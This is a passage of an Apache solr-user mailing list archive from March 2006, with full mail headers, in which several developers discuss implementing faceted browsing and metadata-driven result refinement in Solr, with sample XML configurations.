f8mr73872nfj; Tue, 07 Mar 2006 16:16:36 -0800 (PST) Received: by 161.129.204.104 with HTTP; Tue, 7 Mar 2006 16:16:36 -0800 (PST) Message-ID: <[email protected]> Date: Tue, 7 Mar 2006 19:16:36 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: Re: metadata about result sets? In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 3/7/06, Corey Tisdale <[email protected]> wrote: > Is there any way to get metadata about a search result off of > this bad dog? Hi Corey, >From the standard request handler, you can currently only get the stored fields of documents that matched a query, and the relevancy score of each document. > I am trying to find a good way to search through > several million items, and I think that being able to aggregate data > about the results would help people refine the search, so if they > search for "legal" I could show a result set with 22000 books but > then also ask if they meant thrillers or test prep or career > planning, etc. This type of functionality has been implemented with Solr (faceted browsing), but it's not out-of-the-box functionality - you need to implement a request handler to calculate and return this extra data. See here for an explanation on how CNET did it: http://[email protected]/msg02645.html Simple built-in faceted browsing support is planned though... from http://wiki.apache.org/solr/TaskList * Simple faceted browsing (grouping) support in the standard query handler * group by field (provide counts for each distinct value in that field) * group by (query1, query2, query3, query4, query5) Would that meet your needs? -Yonik From [email protected] Wed Mar 08 16:53:52 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58314 invoked from network); 8 Mar 2006 16:53:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Mar 2006 16:53:49 -0000 Received: (qmail 73516 invoked by uid 500); 8 Mar 2006 16:53:43 -0000 Delivered-To: [email protected] Received: (qmail 73489 invoked by uid 500); 8 Mar 2006 16:53:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 73474 invoked by uid 99); 8 Mar 2006 16:53:42 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Mar 2006 08:53:42 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO omta14.mta.everyone.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Mar 2006 08:53:40 -0800 Received: from dm17.mta.everyone.net (bigiplb-dsnat [161.129.204.104]) by omta14.mta.everyone.net (Postfix) with ESMTP id BEE384357F for <[email protected]>; Wed, 8 Mar 2006 08:53:19 -0800 (PST) X-Eon-Dm: dm17 Received: by dm17.mta.everyone.net (EON-AUTHRELAY2 - 44d5a662) id dm17.44040af0.13b33f for <[email protected]>; Wed, 8 Mar 2006 08:53:17 -0800 (PST) X-Eon-Sig: AQCUn29EDwv9J2FOSgIAAAAB,9f215903ced35abb8432a57aa3923ea9 Mime-Version: 1.0 (Apple Message framework v746.2) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Corey Tisdale <[email protected]> Subject: Re: metadata about result sets? Date: Wed, 8 Mar 2006 10:53:09 -0600 To: [email protected] X-Mailer: Apple Mail (2.746.2) X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Yeah, that is exactly what I mean. There should possibly be one more layer on top of that though, right? Lets say someone says 'Oh yeah, I mean thriller' then you want to show author. You don't want to list 5000 author names right off the bat -- you want to let them pick a letter like 'author last name starts with a', then display author names under that, so there is a sort of rule based precedent on when to return which value list. The flip side is, if there are only 5 authors under thriller category, maybe we should skip the pick a letter step and just show the author names. What if the todo went something like Simple faceted browsing (grouping) support in the standard query handler get resultset and possible refine fields limit refine fields to those appropriate based on result set and precedence of fields group by field (provide counts for each distinct value in that field) group by (query1, query2, query3, query4, query5) Does that make sense? I can be really bad at explaining sometimes. Corey PS - This is gonna rock once it starts maturing. On Mar 7, 2006, at 6:16 PM, Yonik Seeley wrote: > On 3/7/06, Corey Tisdale <[email protected]> wrote: >> Is there any way to get metadata about a search result off of >> this bad dog? > > Hi Corey, > > From the standard request handler, you can currently only get the > stored fields of documents that matched a query, and the relevancy > score of each document. > >> I am trying to find a good way to search through >> several million items, and I think that being able to aggregate data >> about the results would help people refine the search, so if they >> search for "legal" I could show a result set with 22000 books but >> then also ask if they meant thrillers or test prep or career >> planning, etc. > > This type of functionality has been implemented with Solr (faceted > browsing), but it's not out-of-the-box functionality - you need to > implement a request handler to calculate and return this extra data. > > See here for an explanation on how CNET did it: > http://[email protected]/msg02645.html > > Simple built-in faceted browsing support is planned though... from > http://wiki.apache.org/solr/TaskList > > * Simple faceted browsing (grouping) support in the standard query > handler > * group by field (provide counts for each distinct value in > that field) > * group by (query1, query2, query3, query4, query5) > > Would that meet your needs? > > -Yonik From [email protected] Wed Mar 08 19:55:08 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72772 invoked from network); 8 Mar 2006 19:55:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Mar 2006 19:55:08 -0000 Received: (qmail 81659 invoked by uid 500); 8 Mar 2006 19:55:08 -0000 Delivered-To: [email protected] Received: (qmail 81636 invoked by uid 500); 8 Mar 2006 19:55:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 81627 invoked by uid 99); 8 Mar 2006 19:55:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Mar 2006 11:55:07 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO rescomp.berkeley.edu) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Mar 2006 11:55:06 -0800 Received: by rescomp.berkeley.edu (Postfix, from userid 1007) id 62A7B5B776; Wed, 8 Mar 2006 11:54:46 -0800 (PST) Received: from localhost (localhost [161.129.204.104]) by rescomp.berkeley.edu (Postfix) with ESMTP id 5939D7F403 for <[email protected]>; Wed, 8 Mar 2006 11:54:46 -0800 (PST) Date: Wed, 8 Mar 2006 11:54:46 -0800 (PST) From: Chris Hostetter <[email protected]> To: [email protected] Subject: Re: metadata about result sets? In-Reply-To: <[email protected]> Message-ID: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N : layer on top of that though, right? Lets say someone says 'Oh yeah, I : mean thriller' then you want to show author. You don't want to list : 5000 author names right off the bat -- you want to let them pick a : letter like 'author last name starts with a', then display author At a certian point, logic like that really becomes domain specific: you have to know in advance that the author field is soemthng that you want to have two levels of filtering (first by intial, then by full name) meanwhile the category field should have the full list of facets displayed, and the price field should have facets displayed based on ranges -- but hwat should the ranges be? In my experience, there's really two types of faceting: data driven (pick/display facets based entirely on the terms found in the index) and metadata driven (pick the facets based on configuration supplied by an index maintainer who kows about hte nature of the data) data driven faceting is something i think the standard request handler cna support really easily just by having a parameter that lets you specify a list of fields to display faceted counts for relative hte current search. simple metadata driven faceting can be done using the second approach described in the todo: letting the query client supply a list of facet queries as part of the request -- but that really doesn't seem like it can scale up to the level of thousands of authors whose names start with "a" That's the point where writing a custom query handler that knows about hte rules you want to use to drive your facets really makes sense. : letter step and just show the author names. What if the todo went : something like I'll be honest, i'm not really following whatyou mean here, but feel free to elaborate and add your ideas to the wiki ... i would suggest making a new "ComplexFacetingBrainstorming" wiki page with your ideas and link to it from the Todo page. -Hoss From [email protected] Wed Mar 08 20:33:27 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 952 invoked from network); 8 Mar 2006 20:33:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Mar 2006 20:33:27 -0000 Received: (qmail 47230 invoked by uid 500); 8 Mar 2006 20:33:27 -0000 Delivered-To: [email protected] Received: (qmail 47212 invoked by uid 500); 8 Mar 2006 20:33:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 47195 invoked by uid 99); 8 Mar 2006 20:33:27 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Mar 2006 12:33:27 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO omta16.mta.everyone.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Mar 2006 12:33:26 -0800 Received: from dm17.mta.everyone.net (bigiplb-dsnat [161.129.204.104]) by omta16.mta.everyone.net (Postfix) with ESMTP id 6D9B84400E for <[email protected]>; Wed, 8 Mar 2006 12:33:05 -0800 (PST) X-Eon-Dm: dm17 Received: by dm17.mta.everyone.net (EON-AUTHRELAY2 - 44d5a662) id dm17.44040af0.136331 for <[email protected]>; Wed, 8 Mar 2006 12:33:05 -0800 (PST) X-Eon-Sig: AQCUn29EDz+Bg/JAPQIAAAAB,3bdc7850ca693e977dbcfb516de246c4 Mime-Version: 1.0 (Apple Message framework v746.2) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Corey Tisdale <[email protected]> Subject: Re: metadata about result sets? Date: Wed, 8 Mar 2006 14:33:03 -0600 To: [email protected] X-Mailer: Apple Mail (2.746.2) X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I like the idea of the wiki page; I think I will attempt to set one up after this email, but I wanted to see if I could do a little bit better job of fleshing out how pulling metadata out might work (in my mind): Scenario 1: ------------------------------------------------------------------------ ---------------------------------------------------------------- We add suggestable metadata as part of the product schema, so we could have something like <add> <doc> <field name='id">12345</field> <field name="author_first_letter" suggestable="1">Smith</field> <field name="author" suggestable="1" preceding="author_first_letter">S</field> <field name="price_range" suggestable="1">0-25</field> <field name="price">14.23</field> <field name="name">Some Crazy Legal Book</field> </doc> </add> Once we reindex, we do a search for 'legal' again and our book is in it. Based on our index, we can scan the resultset and see that the results have three suggestable fields, two of which do not require a preceding field. We return a list of the attributes and their distinct values for author_first_letter and price_range. If author_first_letter is specified as S in the enxt step of the search, then we offer the author attribute and the distinct values of author where author_first_letter = S If price_range 0-25 is selected, then we don't show price in the metatdata list, since it is not suggestable. I don't think this would be really much more difficult than trying to extract attributes, and it gives people an easier time adiopting this project without shutting down the default functionaity that the TODO list suggests right now. and now to start that wiki... Thoughts? corey From [email protected] Thu Mar 09 03:32:33 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 18867 invoked from network); 9 Mar 2006 03:32:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Mar 2006 03:32:33 -0000 Received: (qmail 88418 invoked by uid 500); 9 Mar 2006 03:32:33 -0000 Delivered-To: [email protected] Received: (qmail 88398 invoked by uid 500); 9 Mar 2006 03:32:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88385 invoked by uid 99); 9 Mar 2006 03:32:32 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Mar 2006 19:32:32 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO nproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Mar 2006 19:32:31 -0800 Received: by nproxy.gmail.com with SMTP id c29so284678nfb for <[email protected]>; Wed, 08 Mar 2006 19:32:10 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=Pau8Wrxq5r1ZNm7ZQiG1RtTYp7yrRRRK0gwOJZVTdOFN7gZqRnZj4R1F4MUkYofYrx7wfB/8S69LQf7IdjA66EFzM/MleQqmCIqtdjLSfEnh+pGjXUf6BY/lKO4RhoV/YMLrR5H7oKHJB7c6fuCQjcZarLPWstVaaiyJmXJp06U= Received: by 161.129.204.104 with SMTP id l2mr760353nfe; Wed, 08 Mar 2006 19:32:10 -0800 (PST) Received: by 161.129.204.104 with HTTP; Wed, 8 Mar 2006 19:32:10 -0800 (PST) Message-ID: <[email protected]> Date: Wed, 8 Mar 2006 22:32:10 -0500 From: "Yonik Seeley" <[email protected]> To: [email protected] Subject: OT: google placement MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N A google search for "solr" finally puts us first, ahead of the biker gang := -) "lucene search server" doesn't find us, but it does if you include replication or distribution. -Yonik From [email protected] Thu Mar 09 05:59:25 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88304 invoked from network); 9 Mar 2006 05:59:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Mar 2006 05:59:25 -0000 Received: (qmail 1374 invoked by uid 500); 9 Mar 2006 05:59:24 -0000 Delivered-To: [email protected] Received: (qmail 1337 invoked by uid 500); 9 Mar 2006 05:59:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 1327 invoked by uid 99); 9 Mar 2006 05:59:24 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Mar 2006 21:59:24 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO rescomp.berkeley.edu) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 08 Mar 2006 21:59:23 -0800 Received: by rescomp.berkeley.edu (Postfix, from userid 1007) id 351515B770; Wed, 8 Mar 2006 21:58:52 -0800 (PST) Received: from localhost (localhost [161.129.204.104]) by rescomp.berkeley.edu (Postfix) with ESMTP id 29D0B7F403 for <[email protected]>; Wed, 8 Mar 2006 21:58:52 -0800 (PST) Date: Wed, 8 Mar 2006 21:58:52 -0800 (PST) From: Chris Hostetter <[email protected]> To: [email protected] Subject: Re: OT: google placement In-Reply-To: <[email protected]> Message-ID: <[email protected]> References: <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N : A google search for "solr" finally puts us first, ahead of the biker gang :-) i think your search history is affecting your results. I'm still seeing the biker gang on top. -Hoss From [email protected] Fri Mar 10 06:45:42 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 60461 invoked from network); 10 Mar 2006 06:45:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Mar 2006 06:45:42 -0000 Received: (qmail 54838 invoked by uid 500); 10 Mar 2006 06:45:02 -0000 Delivered-To: [email protected] Received: (qmail 54818 invoked by uid 500); 10 Mar 2006 06:45:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54775 invoked by uid 99); 10 Mar 2006 06:45:01 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Mar 2006 22:45:01 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO rescomp.berkeley.edu) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 09 Mar 2006 22:45:00 -0800 Received: by rescomp.berkeley.edu (Postfix, from userid 1007) id 036035B773; Thu, 9 Mar 2006 22:44:30 -0800 (PST) Received: from localhost (localhost [161.129.204.104]) by rescomp.berkeley.edu (Postfix) with ESMTP id EEBAE7F403 for <[email protected]>; Thu, 9 Mar 2006 22:44:30 -0800 (PST) Date: Thu, 9 Mar 2006 22:44:30 -0800 (PST) From: Chris Hostetter <[email protected]> To: [email protected] Subject: Re: metadata about result sets? In-Reply-To: <[email protected]> Message-ID: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N : I like the idea of the wiki page; I think I will attempt to set one : up after this email, but I wanted to see if I could do a little bit : better job of fleshing out how pulling metadata out might work (in my I finally got a chance to look at your ideas. first off: as far as i know, there isn't any spcial edit permissions neccessary to modify the TaskList ... if the edit link wasn't showing up for you after you logged in, it might just be that the page was cached, try a force-reload. Okay, on to the [email protected].. : We add suggestable metadata as part of the product schema, so we : could have something like There's a difference between the index schema, and the "xml schema/dtd" for adding documents. You seem to be suggesting a change to the xml used when adding documents to indicate wether a field should be suggestable or not, but that syntax is tied directly to the underlyng lucene API for Documents/Fields -- where would the suggestable/preceding info be stored? : Once we reindex, we do a search for 'legal' again and our book is in : it. Based on our index, we can scan the resultset and see that the : results have three suggestable fields, two of which do not require a : preceding field. I'm not sure what you mean by "scan the result" to get to get the suggestable (and their values) ... can you elaborate? I'm not sure if you read the thread yonik mentioned earlier about how we do this at CNET, but the way we store info about which fields we want to have facets on (and what those facets should be in the case of range queries and such) is to put "metadata documents" into the index. for a single user request, you pull out the metadata document, then use the info contained in it to determine facets to search on and intersect with the main result. the format of hte metadata docs we use is very custom, but perhaps a similar, generalized approach could be implimented? The plugin could dictate a specific XML format indicating the behavior to drive the facets using either of hte following mechanisms (more could be added as needed)... * make group FF of all indexed values of field F * make group G using queries x, y, and z with labels a, b, and c ...users could index one or more metadata documents, containing the XML info in any stored field they want defined in the schema -- when configuring the plugin, they'd specify the field in the solrconfig.xml. at query time, they specify two queries: one to restrict the main results, and one to identify the metadata doc they want to use (if it's allways the same one, a defualt could be configured in solrconfig as well) an example of what i mean about XML stored in a field of the metadata doc... <facets> <group id="price" label="Price"> <facet id="0-20" label="Under $20">price:[0 TO 20]</facet> <facet id="21-40" label="$21 - $40">price:[21 TO 40]</facet> <facet id="41-60" label="$41 - $60">price:[41 TO 60]</facet> </group> <group id="initial" label="Author"> <facet id="a" label="A">author:a*</facet> ... </group> <group id="name" label="Author" depends="initial"> <facet use-terms-field="author" /> </group> ... </facets> -Hoss From [email protected] Fri Mar 10 15:57:43 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86814 invoked from network); 10 Mar 2006 15:56:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Mar 2006 15:56:44 -0000 Received: (qmail 18055 invoked by uid 500); 10 Mar 2006 15:56:28 -0000 Delivered-To: [email protected] Received: (qmail 18034 invoked by uid 500); 10 Mar 2006 15:56:28 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18025 invoked by uid 99); 10 Mar 2006 15:56:28 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Mar 2006 07:56:28 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO omta16.mta.everyone.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Mar 2006 07:56:27 -0800 Received: from dm17.mta.everyone.net (bigiplb-dsnat [161.129.204.104]) by omta16.mta.everyone.net (Postfix) with ESMTP id 5634D40F23 for <[email protected]>; Fri, 10 Mar 2006 07:56:06 -0800 (PST) X-Eon-Dm: dm17 Received: by dm17.mta.everyone.net (EON-AUTHRELAY2 - 44d5a662) id dm17.44040af0.18ee2d for <[email protected]>; Fri, 10 Mar 2006 07:56:05 -0800 (PST) X-Eon-Sig: AQCUn29EEaGVQqxPlgIAAAAB,f996f7e518b7d1fa1cc64bc52fa48bd9 Mime-Version: 1.0 (Apple Message framework v746.2) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Corey Tisdale <[email protected]> Subject: Re: metadata about result sets? Date: Fri, 10 Mar 2006 09:56:04 -0600 To: [email protected] X-Mailer: Apple Mail (2.746.2) X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Interesting... I have been looking at lucene in my spare time at work for all of 3 days now, so I have to apologize for my lack of understanding when it comes to how it works specifically :) We have a terrrible internal search that we are looking to replace, and the only thing it does well is help you refine a terrible resultset with facted metadata. The way that we build the metatdata list is post- indexing of product, we would actual build a bit sequence that corresponds to all possible key/value combos for each product and associate each variation with the product. Then wehn someone refines with the price range, lets say, we just look for the one that matches. It gets a bit crazy, but it is the only way we could get the speed down for millions of documents in the index. I did read that email from cnet the other day, but it didn't really register what they were talking about until I saw your metadata group xml exmaple doc here. For the schema, I just meant the document format. the file is called schema.xml. I haven't tried it, but it looks like you can change that to affect the way solr works without actually affecting the way lucene handles it. Is that wrong? I guess it doesn't really matter, since it looks like your indexable groups make more sense from a maintainability standpoint (less redundant data). As for 'scanning the resultset', I can see how I was a little shy on the details. Sorry about that. I meant look through the results to see what facets apply to the resultset. So if my company sells books and power tools, when someone searches for 'the little engine who could', once we know there are no power tools in the result set, I don't show the refinement facets for power tool metadata (like wattage or battery operated or blade size). For a big group of diverse data, we could potentially have several hundred group names, and it seems like it might be redundent to search for 300 metatdata types when we know that only 5 apply to the resultset. If, however, speed is not impacted noticably by searching for metadata that does not exist, then we don't need to worry about this. I am not familir enough with lucene's performance to know which would be more optimal. In your example file, how does the name facet know to display only the names that start with whatever intial was selected? Would that be built in by modifying our result set first (by applying the author:a from the initial metadata group) then letting it gather all author names on the new set? That seems the easiset way to me, but I don't know how the would affect speed with lucene. I think what I am starting to understand is that coming from what we have (a rdbms based metadata gathering system), I need to rethink my process. Ive spent so much time training myself to think in terms of how to make things fast in mysql that I need to re-open my mind :) -Corey On Mar 10, 2006, at 12:44 AM, Chris Hostetter wrote: > > : I like the idea of the wiki page; I think I will attempt to set one > : up after this email, but I wanted to see if I could do a little bit > : better job of fleshing out how pulling metadata out might work > (in my > > I finally got a chance to look at your ideas. > > first off: as far as i know, there isn't any spcial edit permissions > neccessary to modify the TaskList ... if the edit link wasn't > showing up > for you after you logged in, it might just be that the page was > cached, > try a force-reload. > > Okay, on to the [email protected].. > > : We add suggestable metadata as part of the product schema, so we > : could have something like > > There's a difference between the index schema, and the "xml schema/ > dtd" > for adding documents. You seem to be suggesting a change to the > xml used > when adding documents to indicate wether a field should be > suggestable or > not, but that syntax is tied directly to the underlyng lucene API for > Documents/Fields -- where would the suggestable/preceding info be > stored? > > : Once we reindex, we do a search for 'legal' again and our book is in > : it. Based on our index, we can scan the resultset and see that the > : results have three suggestable fields, two of which do not require a > : preceding field. > > I'm not sure what you mean by "scan the result" to get to get the > suggestable (and their values) ... can you elaborate? > > > I'm not sure if you read the thread yonik mentioned earlier about > how we > do this at CNET, but the way we store info about which fields we > want to > have facets on (and what those facets should be in the case of range > queries and such) is to put "metadata documents" into the index. > for a > single user request, you pull out the metadata document, then use > the info > contained in it to determine facets to search on and intersect with > the > main result. > > the format of hte metadata docs we use is very custom, but perhaps a > similar, generalized approach could be implimented? > > The plugin could dictate a specific XML format indicating the > behavior to > drive the facets using either of hte following mechanisms (more > could be > added as needed)... > * make group FF of all indexed values of field F > * make group G using queries x, y, and z with labels a, b, and c > ...users could index one or more metadata documents, containing the > XML > info in any stored field they want defined in the schema -- when > configuring the plugin, they'd specify the field in the > solrconfig.xml. > at query time, they specify two queries: one to restrict the main > results, > and one to identify the metadata doc they want to use (if it's > allways the > same one, a defualt could be configured in solrconfig as well) > > an example of what i mean about XML stored in a field of the metadata > doc... > > <facets> > <group id="price" label="Price"> > <facet id="0-20" label="Under $20">price:[0 TO 20]</facet> > <facet id="21-40" label="$21 - $40">price:[21 TO 40]</facet> > <facet id="41-60" label="$41 - $60">price:[41 TO 60]</facet> > </group> > <group id="initial" label="Author"> > <facet id="a" label="A">author:a*</facet> > ... > </group> > <group id="name" label="Author" depends="initial"> > <facet use-terms-field="author" /> > </group> > ... > </facets> > > > -Hoss > From [email protected] Sat Mar 11 06:14:08 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 29030 invoked from network); 11 Mar 2006 06:14:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 11 Mar 2006 06:14:07 -0000 Received: (qmail 95019 invoked by uid 500); 11 Mar 2006 06:14:07 -0000 Delivered-To: [email protected] Received: (qmail 94988 invoked by uid 500); 11 Mar 2006 06:14:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <solr-user.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 94979 invoked by uid 99); 11 Mar 2006 06:14:07 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Mar 2006 22:14:07 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO rescomp.berkeley.edu) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 10 Mar 2006 22:14:05 -0800 Received: by rescomp.berkeley.edu (Postfix, from userid 1007) id 0108E5B77D; Fri, 10 Mar 2006 22:13:35 -0800 (PST) Received: from localhost (localhost [161.129.204.104]) by rescomp.berkeley.edu (Postfix) with ESMTP id E7B547F403 for <[email protected]>; Fri, 10 Mar 2006 22:13:35 -0800 (PST) Date: Fri, 10 Mar 2006 22:13:35 -0800 (PST) From: Chris Hostetter <[email protected]> To: [email protected] Subject: Re: metadata about result sets? In-Reply-To: <[email protected]> Message-ID: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N : facted metadata. The way that we build the metatdata list is post- : indexing of product, we would actual build a bit sequence that : corresponds to all possible key/value combos for each product and : associate each variation with the product. Then wehn someone refines Hmmm... you can do something similar in solr by leveraging the Filter caching, but you don't need to build a DocSet (bit sequence) for every combination of values -- just one per value. When you want to know what the result is from combining multiple facets, you intersect the DocSets. : For the schema, I just meant the document format. the file is called : schema.xml. I haven't tried it, but it looks like you can change that : to affect the way solr works without actually affecting the way : lucene handles it. Is that wrong? I guess it doesn't really matter, well, the schema.xml lets you define the fields, and what options you want those fields to have -- but the set of options is fixed (and tied to the set of options available in lucene). You could have a "suggestable" field in every doc which contained a list of field names 